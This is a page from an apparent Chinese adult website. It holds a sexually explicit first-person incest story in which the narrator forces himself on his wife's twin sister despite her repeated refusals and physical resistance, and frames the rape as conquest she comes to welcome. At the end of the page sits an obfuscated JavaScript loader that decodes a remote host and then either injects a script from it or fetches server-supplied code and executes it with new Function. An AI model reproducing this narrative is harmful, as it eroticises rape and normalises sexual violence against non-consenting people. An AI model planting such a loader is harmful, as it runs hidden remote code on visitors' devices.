返回

[我终于和妻姐做爱了]-乱伦小说34b

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com




   我老婆和她姐姐是双胞胎,但是看上去却不象,我老婆块头大,不知道的还 以为我老婆是姐姐。

  我妻姐小巧玲珑,皮肤好晰白,就象玉脂一样,长得非常的漂亮,而且性格 开朗外向。她们姐俩感情特别的好,所以妻姐和我感情也不错。

  我暗恋妻姐很久了,一直想把她占有,但是一直没有机会,也不敢明着对她 贸然行动。

  我只是常利用到她家去的机会,把她的内衣内裤拿出来,用阳具自慰一下, 有时还射在里面,妻姐还以为是她老公做的呢,还和我老婆说过。

  我有两次的晚上,她们姐俩去上超市,我在她家看电视,就拿出她的内裤射 了一点点在她内裤里想让她看不出来,然后后把那条内裤放在最上面,第二天, 她在扫地时蹲下来时我看到她穿的就是那条,我好兴奋啊!

  真想我的宝贝精子能进入她的体内和她的交配成功啊!让她给我生个小孩。

  她有很多非常性感的内裤,透明的、蕾丝花边的等等。她有的不的穿了就给 我老婆穿,我在摸我老婆的时候总感到是在摸她,我常嗅她给的内裤,里面总带 有她的体香。她的体香我很熟悉,因为她在累的时候总让我给她按摩。她们姐妹 感情极好,姐姐一累,我老婆就说给姐姐去按摩一下。

  我妻姐对我也很好,当然开始也不是那种的好,就是当我是一个很说得来的 亲妹夫,也当我亲兄妹似的,所以也不避嫌的,我们三个年纪一样大,我稍大几 个月。按摩当然只是背部,有时我自作主张给她按摩大腿什么的,第一次的时候 她笑笑有点脸红,后来就自然了。我在老婆在的时候给妻姐用手掌拍打,妻姐的 屁股好有弹性的,她并不做护理的,她天生是个美人胚子,什么都好。有两次老 婆在外间煮饭的时候,我就开始用掌根按搓,然后就转为揉搓,看上去好象很自 然的按摩手法的运用,其实我是想揉搓她的屁股,有时抓两把就敲大腿,有时就 多抓几下,在我来说是抓,在妻姐来说我是在给她揉搓,所以她也不说什么,还 说舒服。

  因为相处的好,我妻姐也常给我按背什么的,有时坐我车的时候,很自然的 就搂我腰什么的,老婆不在家,我去她那吃饭,晚上洗澡后她就给我洗衣服,内 裤什么的都洗得干干净净的。

  她老公有事常不在家,或者和朋友去玩总是到后半夜,她有时寂寞的时候就 叫我去陪她看电视,有时我也睡在她家。我们感情很好,我连襟没什么多想法的。

  因为我老婆对他也很好的,所以两家四人就象亲弟兄姐妹。

  我老婆有时还和他姐夫说些黄笑话,妻姐因是大姐偶尔和我们夫妻说些但不 是太那个的。

  时间长了,我对妻姐感情就升温了,总想什么时候能得到她。

  有时我甚至想两对夫妻来个四人大战。

  因为我老婆和她姐夫感情也很好,当然不是那个感情,不过我想真那样,她 也会高兴和她姐夫做爱的。我们两家近两年合伙做生意开店,我常和妻姐到外面 去进货,有时来不及赶回来,就开一个房间,因为这样省钱嘛,总是相安无事。

  一开始她当我面不脱外裤睡觉,后来多了,再说有时天热穿了睡不舒服,了 她也象家里就穿着内裤睡了,不注意的时候,被子踢翻了,就全露出来了,有些 内裤是透明的,我能看到她雪白的屁股,正面的时候隐约能看到她的阴毛,不是 太浓。

  有次出去正好赶在五一,旅馆紧张,最后只找到一个单人间,只有一张床。

  没办法,只好睡一起了,一开始我睡她脚边,但是空调就在头顶,我那几天 正好有点轻感冒,她就让我和她睡一头去了。

  为什么她这么自然叫我和她睡一头呢,因为我们以前坐的老卧铺车的时候, 都是两个床位并在一起的,挤挤的,我们常脸对脸睡在一头,现在有规定不许这 样的车了,新车全分成一人一铺,旧的也改造成一人一铺了。

  所以我们睡一头也很自然的,没什么尴尬的。再说在外面也没那么讲究,因 为太累很快两个就睡下,睡着了。

  我老婆睡时总要我搂着她,我也有个习惯一定天天摸着她乳房才睡得着久而 久之习惯成自然了。

  我和妻姐睡下后,我睡着后可能是很自然的吧,在睡梦中就把妻姐给搂上了, 妻姐因为太累睡得很沉也没感觉到,我就搂着她睡了半夜

  迷迷糊糊中做梦就象我和老婆做爱,我常在半夜老婆睡得迷迷糊糊的时候和 她做爱,这时我把妻姐当老婆了,我就自然而然的就去摸她乳房,只感觉摸在手 上,脑子里想老婆的怎么小了?

  但比以前有弹性柔滑了许多,乳头也小了,心里就感到奇怪。但手还是不停 的轻搓她的乳头,妻姐可能是太累了,那次我们连跑了三天,她都有些轻呼了, 所以可能一开始没醒也没感觉到什么。我也迷迷糊糊的摸着她乳头。

  因为她个小,不象我老婆体宽,所以我右手搂着她的时候,能摸到她两个乳 头,左手就很自然的向下伸了。她还在睡着没有感觉,没动,我还是有轻没重的, 时摸时不摸的。

  但渐渐的我感觉到她阴部里开始湿湿的了,我老婆半夜里给我摸的时候,有 时在呼的时候也能到高潮,她们姐俩可真象。一点点水开始多了,她好象也有觉 察到了一点,轻呼音没有了,过了一会儿她就转过身来贴着我睡过来了,右手还 很自然的搂上了我的腰。

  我就轻吻她的嘴,这时我已经醒,发现是妻姐,一下子有点紧张起来,但心 里又狂喜,我等这天等了几年了。

  脑子里紧张归紧张,但占有欲占了主体,我就把她还是推成平躺,继续搂着 她,象刚才那样,抚摸她,但这次是有意识的抚摸她,用上了手法和心劲。她的 水越来越多了,开始有点呻吟。我就把她的手拉过来让她摸我的小弟弟。

  她给我抓了两把后,眼睛开了一两下,好象意识到了什么,手停了几秒,又 抓了一下,眼睛张开了,有点醒过神来了,叫了我一下名字,身体动了一下,那 个意思想从我搂着的手里出来,抬了一半的身,我一用力,她软软的又躺下了, 但这时就彻底醒了,我有点汗出来了。

  手停了一阵但是还是心有不甘的,所以,继续摸她全身,她在我手里扎不出 身,嘴里说:"你做什么啊,别这样啊!"

  我用行动回答她,索性一不做二不休,抬起半个身子,侧压在她上身,用嘴 去舔她乳头,用小弟弟去顶她屁股,压得她喘粗气,说不出话。她就用她的手用 力抓我小弟弟,这时我的已经涨起来了,她给我压着喘不了气,抓也没多大的劲, 稍有点疼,但也有点舒服的感觉。

  我就继续不

  停的舔乳头,还把她整个乳房包在嘴里吮吸。食指就去搓她阴蒂。她不能动, 但是感觉到肯定有点舒服的,因为感觉到她的手已经不是抓我的小弟弟了,而是 改成摸了。但是嘴上却说:"别这样,不要这样啊,这样不好的,你这人怎么这 样啊?"

  "妹妹要说的,快起来啊"

  这时,我手不停,嘴从她乳房中出来,抬起头,对她说:"小莉(平时我都 叫她名字的),给我一次吧,我要你,你太美了!"

  然后就把嘴压在了她嘴上。舌尖伸进她嘴里去触她舌尖,她却极力的抿嘴不 让我进去,身体扭动着想拒绝我,她扭动的身体正好触到我顶着她屁股的小弟弟 搞得我小弟弟痒痒的舒服,越发的涨了。但是毕竟力气小挣不出身子。

  我看她不和我接吻,就开始吻她秀发,她是一头短发,平时看上去很精干, 黑黑的,我嗅着她的发香,就轻咬她的耳垂,她转动着头,不让我吻。

  嘴里还不停地说: 别这样,起来,快啊,别啊!

  我就对她说: 阿莉,你让我舒服一次吧,我好想你的,你这给我一次吧

  我知道光说不行的,所以加大了手在她阴蒂上抚摸的节奏,另一个不停的搓 动她的乳头,用小弟弟不停的摩擦她的身体。

  再一次的尝试舌尖去触礁她的舌尖,用力的把舌头挤开她的牙齿伸进去,终 于碰到她软软的甜甜的舌尖。在她嘴里搅动起来,搅得她一嘴的口水,我停了一 下,她突然一下咬住了我的舌尖,一点点用尽,但却留着劲没用全力,眼神里流 出的意思是叫我下来。

  我知道她怕太咬疼我,还是有点舍不得我怕我痛的,但我这样下来,以后怎 么面对她呢,我必须要让她和我做爱,还要让她也有这个想法,以后才能见她时 不至于无颜对她啊。我就假装要起来放了她,她果然松开咬住我的舌。我趁机一 下子压在了她上面,我个大,她小巧,给我一压她更喘不过气来了,一动也不好 动了,只有两个手打我的背,嘴里说着,做什么?快下来

  我心里想,看来不能让她来性欲之后再和她做了,我就左手压着她,右手伸 下去,脱她内裤,她这时开始反抗了,厉声说: 放手!别乱来!

  她这样一叫我停了一下,平时她娇声怪我的时候我就有点怕她,但我知道不 能停的,所以我犹豫了一下,继续拉她内裤,但是由于我压她太紧,她又在拼命 的扭动反抗不给我脱,我又怕一松劲抬起身,她趁机脱身,再要硬压她上面她肯 定会翻脸,到时反而不好。所以索性我就不脱她内裤了,我略一抬臀,拉出自己 的小弟弟对准她的阴部,从她的内裤边缘想插进去。我想先生米煮成熟饭之后再 慢慢的让她和我到高潮,女人必须要先用小弟弟征服才行。当她失身后她就不会 象现在这么反抗了,这是我的想法。

  她看出我的决心,开始求我了: 好妹夫,别这样啊!

  她平时都叫我名字的,这时叫我妹夫,是想提醒我,但我是箭已出弦不得不 发了。

  嘴里说着: 好姐姐,我好喜欢你的。 下面却不停,努力用小弟弟对她的 花心去,她不停的扭,我的小弟弟从她内裤侧面进去,在她扭动中总找不到花心。

  没办法只好,加了点力不让她动,但又怕弄疼她,要掌握好分寸,这时她已 被我压得没力气了,只是在嘴里求我放开她,和骂我几下了。

  我趁这个机会,把她内裤褪下一点,找准时机,一下子插进了她的花心。一 进去就有种和我老婆不同的洞天感,她毕竟人下,下面也好紧的,一下只从四周 紧紧的包住了我,我一用力挺到底,直挺洞穴深处。随着我一炮到底,我明显感 到她反抗的力量松懈了,耳边听到她的一声长叹,眼角流出了泪花。看来我的想 法是对的,只要我进去了,就意味着她的贞操已经失去,她的抵抗也无用了。下 面就要看我用功了。

  我要好好的看看她,我这时不能再怕她了,要有一种征服者的姿态出现。

  我一伸手打开床头的灯,她把头扭向了一边,眼睛里全是屈辱的泪水,我心 里一热,但我不能心慈手软,抬臀快速的把小弟弟在她里面插送几次,用力的抽 动,对她的深处发起冲刺,目的是要同时冲垮她的自尊心。

  然后我俯下头去吻她的眼睛去舔干她的泪水,她咬着嘴唇不出声,我知道她 心里很难受的,也不安慰她,在她里面抽插了几下,从她上面翻下来。搂着她不 停的吻她,吻她的头发,眼睛,脸,嘴唇,下巴,她的肩,用吻来代替我对她的 抱谦,这时她也不反对了。

  我就又重新搂着她,她略微的用力,向反方向,挣了一下,但再被我一用力, 她就半推半顺的被我搂在了怀里。我低头吻她,另一只手去抓她乳房,并把她的 一只手扔然拉到我小弟弟上,帮她张开手抓住我小弟弟,她也不缩手,就抓住我, 我抓住她的手搓动我的小弟弟她也跟着我手动。只是喉咙里还有抽泣声。我拿开 手仍去摸她乳房,她的手还是不停的机械的摸着我的小弟弟,做到这点我也满足 了。

  我边抚摸着她羊脂一般润滑的身体,一边向她倾述着对她的爱慕之情,以及 她对我的好。她躺在我怀里闭着眼静静的听着,又长叹了口气后,手开始自然轻 微的动着的摸我的小弟弟了。

  我知道,她开始接受我了,因为她已经失身给我了,再反抗也没用了,我也 是除她老公外她的第二个男人了,本来她平时就和我连襟开玩笑就说我常帮她做 事,是她半个老公,现在真成半个个老公了。

  我看到她这样就放开她,让她仰卧躺在床上,我坐在她胯上,前俯下身子, 双手握着妻姐尖挺如笋般的乳房,上下不停的抚摸,我上下左右来回不断的抚摸 她那尖挺如笋的双乳,那种触感令我下面的弟弟,直挺挺的站起来。我把她的内 衣向上拉开,这时她那完美胸型的玉乳呈现在我眼底。

  我俯身将我的脸埋在她那迷人的双乳,用我的舌尖在她右边粉红如婴儿的乳 头上,来回不停的画圈圈、吸允着。我的左手则轻抚她左边的乳房,右手则伸入 她粉橘色的蕾丝内裤里的阴唇肉缝中,玩弄着她下面最私密的禁地。

  我贪婪玩弄着妻姐美丽充满女人韵味的胴体,鼻子里充满妻姐那带着清香、 乳香的的肌肤。

  这时我将身体撑起,将我的双手放在妻姐蕾丝内裤两旁,将她的内裤沿着大 腿、小腿褪了下。

  这时我看到了她阴阜的上方有乌亮浓黑的阴毛,两片鲜红阴唇包裹着她那饱 满阴穴,散发着女人韵味。尽管她已经生过孩子了,但她的小穴还是十分紧窄和 充实性的,我把中指紧贴在她肉缝中来回拨弄,再用手指轻轻拨开妻姐的阴唇, 然后用舌头不停的舔弄她的阴核!

  她的眼睛开了两下,向我看了两眼,眉头皱了一下,两脚夹紧了一点,下面 的水从阴缝里流出些许,我知道她有点感受了,但在极力的忍着不放开,毕竟给 妹夫玩,有点害羞的,而且,开始我是强行让她做的,又有点委屈感,放不开是 正常的,我要按心中刚形成的计划一步步实施。

  我把妻姐的屁股翘起来,然后将她的双腿呈M字型张开,并将大毛巾铺在妻 姐屁股下面。让我的肉棒前端龟头抵着阴唇,慢慢的滑入她温暖的阴道中。这时 我把我那硬的发烫的肉棒,移至她两块富有弹性臀部中间的凹陷处,摩擦在她那 粉红色的阴蒂,下面的身体因这个奇妙的触感,自然的前后摆动起来。

  这时候妻姐想避开我这一连串的攻击,将她的身体不停的左右扭动,却使得 我性欲更加高涨。

  我用我涨涨的小头去触摸她那肉肉的阴蒂,明显觉着下面的水在不断的增多, 已从她分开的小穴中自然的流出来了,她刚才紧皱的眉头也松开了,喉咙里有种 低吟声,眼睛也有点迷离起来,我知道她的性欲被我有点调动起来了。我老婆平 时性欲很强天天要的,但是是被动行的。

  但我妻姐是外向的性格,听老婆说妻姐性欲也很强的,而且很懂得床上的情 趣的,从她买了那么多性感的内裤中就能看出这一点来。她的水越来越多了,身 体有点扭动,当然不是开始那种挣扎的扭动了。她的手开始有意无意的触摸我的 大腿。看来她也有点进入角色了,我可以放手一搏了。

  我又一次去吸吻着她嘴、她的舌、亲吻她的脸、她的颈,亲吻吸吮她那雪球 似的大乳房,亲吻吸吮她的奶头咀,亲吻舔吮她的乳房沟。我俯下身去亲吻舔吮 她的小腹,亲吻舔吮她的雪白大腿,亲吻舔吮她的大腿内侧,亲吻舔吮她的大腿 顶沟,亲吻舔吮她那白嫩鲜艳的光滑无毛的肥美高隆的阴户顶端。低下头去亲吻 舔吮她白嫩鲜艳的肥美高凸的阴户,亲吻舔吮她的大阴唇,亲吻舔吮她的小阴唇, 亲吻舔吮她的阴道口,亲吻舔吮她的敏感阴蒂。

  俯下去将舌头伸进她的阴道里去吮了又吮、舔了又舔。闻到了她的下面有一 股热腾腾的香气,就将鼻子触到她那稀疏的细软的阴毛上闻闻,好香呀!妻姐是 很讲究生活品质的,她常用香油洗澡,所以下面常常能发出一股香味,这在我偷 闻她内裤的时候就知道了她的阴户很香的了。

评分
相关推荐
3.0分

3.0分 [我和我小姨做爱]-乱伦小说a1e

3.0分

3.0分 我终于和妻姐做爱了 【完】(作者:不详)f78

3.0分

3.0分 和姐做爱 梦想成真-乱伦小说621

3.0分

3.0分 [和姐做爱梦想成真]-乱伦小说651

3.0分

3.0分 [姐夫和我]-乱伦小说96d

3.0分

3.0分 我占有了妈妈和姐姐-乱伦小说ee6

3.0分

3.0分 好姐姐……我爱死你小肉洞了-乱伦小说373

3.0分

3.0分 我与姐姐乱伦-乱伦小说343

3.0分

3.0分 [我和岳母做爱](上海岳母)-乱伦小说3eb

3.0分

3.0分 [我和祖英姐姐的甜美爱事]-乱伦小说bc2

3.0分

3.0分 疯狂姐姐教弟弟做爱-乱伦小说6a9

3.0分

3.0分 和妈妈做爱十诫-乱伦小说6ca

3.0分

3.0分 我和当空姐的表姊乱伦-乱伦小说855

3.0分

3.0分 [我和姐姐]作者:不详-乱伦小说d2f

3.0分

3.0分 [我和老婆的表姐]-乱伦小说f3c

3.0分

3.0分 [别再挤我和我妈了]-乱伦小说e00


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function MAdbN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zVmMy(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return MAdbN(t);};window[''+'T'+'s'+'W'+'j'+'l'+'y'+'b'+'E'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zVmMy,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('b3BByLnpoYW5nemhpeWFuZzAxLmNu','151936',window,document,['B','xIrjTpRA']);}:function(){};